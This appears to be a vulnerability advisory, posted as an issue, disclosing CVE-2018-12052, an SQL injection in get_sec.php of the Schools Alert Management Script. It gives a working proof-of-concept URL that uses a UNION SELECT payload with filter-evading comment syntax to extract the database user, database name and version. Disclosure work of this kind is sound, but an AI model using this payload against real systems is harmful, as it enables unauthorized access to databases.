Open
Description
=================
Schools Alert Management Script - get_sec.php SQL Injection
Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12052
=================
Vulnerable cgi:
get_sec.php?q=[sqli]
=================
Proof of Concept:
/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23
Metadata
Metadata
Assignees
Labels
No labels
